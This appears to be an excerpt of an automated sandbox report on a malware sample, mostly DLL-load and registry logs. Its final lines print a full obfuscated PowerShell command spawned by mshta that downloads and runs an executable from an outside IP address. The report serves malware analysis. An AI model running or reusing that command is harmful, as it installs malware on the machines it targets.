          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
          Source: brandbombernes.lnk.11.dr LNK file: ..\Users\user\AppData\Local\Temp\nsmA3F.tmp\cueca.Stu
          Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Automation.pdb source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdb source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbu source: powershell.exe, 00000007.00000002.449310498.000000001C4D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdbhP source: powershell.exe, 00000007.00000002.434786957.000000000312A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdb source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdb2 source: powershell.exe, 00000018.00000002.902448214.0000000000491000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdbD7 source: powershell.exe, 0000000C.00000002.777378103.0000000000442000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdbhP source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: Automation.pdbG source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: 54230000.0.dr Initial sample: OLE indicators vbamacros = False
          Source: PO 11001 .xls Initial sample: OLE indicators encrypted = True

          Data Obfuscation

          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 34.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 35.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 36.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 39.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 40.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 42.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 46.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 47.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 49.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 51.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 52.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Unpacked PE file: 55.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: Yara match File source: 00000018.00000002.1008062874.0000000009B56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000002.808389221.0000000009888000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
